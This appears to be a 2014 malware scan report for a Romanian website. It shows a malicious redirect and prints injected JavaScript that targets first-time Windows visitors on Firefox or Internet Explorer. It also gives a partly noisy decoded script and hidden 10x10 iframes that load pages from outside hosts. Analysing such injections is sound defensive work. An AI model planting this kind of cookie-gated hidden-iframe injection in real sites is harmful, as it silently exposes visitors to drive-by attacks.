Malicious/Suspicious Redirects
Request | Server response | Status |
http://paulgrangure.ro/ (imitation of visitor from search engine): GET / HTTP/1.1; Host: paulgrangure.ro; Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently; Connection: close; Date: Mon, 07 Jul 2014 02:33:56 GMT; Location: http://195.242.161.162/stats/priemIframe.php; Server: Apache; Content-Length: 252; Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://paulgrangure.ro/ | 200 OK; Content-Length: 27092; Content-Type: text/html | malicious (details below) |
http://paulgrangure.ro/test404page.js | HTTP/1.1 302 Found; Connection: close; Date: Mon, 07 Jul 2014 02:34:02 GMT; Location: http://195.242.161.162/stats/priemIframe.php; Server: Apache; Content-Length: 228; Content-Type: text/html; charset=iso-8859-1 | clean |
http://195.242.161.162/stats/priemiframe.php | 404 Not Found; Content-Length: 299; Content-Type: text/html | clean |
http://195.242.161.162/test404page.js | 404 Not Found; Content-Length: 292; Content-Type: text/html | clean |

Malicious code found on http://paulgrangure.ro/ (confirmed by antiviruses, see antivirus reports below):

    function get_cookie(Name) {
        // read the named cookie; returns '' when it is not set
        var search = Name + "=";
        var returnvalue = "";
        if (document.cookie.length > 0) {
            offset = document.cookie.indexOf(search);
            if (offset != -1) {
                offset += search.length;
                end = document.cookie.indexOf(";", offset);
                if (end == -1) end = document.cookie.length;
                returnvalue = unescape(document.cookie.substring(offset, end));
            }
        }
        return returnvalue;
    }
    function set_cookie(name, value) {
        // long-lived marker cookie (expires April 2024) so the injection runs once per visitor
        var cxdate = new Date();
        cxdate.setYear(2024);
        cxdate.setMonth(3);
        cxdate.setDate(3);
        document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';
    }
    var br_reg = /(Firefox|MSIE)/i;
    var usr_os = navigator.userAgent;
    // fires only for Windows visitors on Firefox or Internet Explorer, and only on their first visit
    if (get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) {
        document.write('');  // payload argument not shown in the scan output; see "Decoded script" below
        set_cookie('toppedup', '1010101');
    }

Decoded script:

    asdas asdas n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i] n[i]
    <iframe src='http://mindphuc.cu.cc/showthread.php?t=86171563' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

Antivirus reports:

    Hidden iFrame found. size: 10x10; style: hidden; src: http://standby.fm/bands/filtr1.php?hashftp=ca6376133096ceb63056033ff9f6ff24&hashpage=d1546d731a9f30cc80127d57142a482b
    <iframe src="http://standby.fm/bands/filtr1.php?hashftp=ca6376133096ceb63056033ff9f6ff24&hashpage=d1546d731a9f30cc80127d57142a482b" width=10 border=1 height=10 style="visibility:hidden">
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=paulgrangure.ro
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://paulgrangure.ro/
Result: paulgrangure.ro is not infected or malware details are not published yet.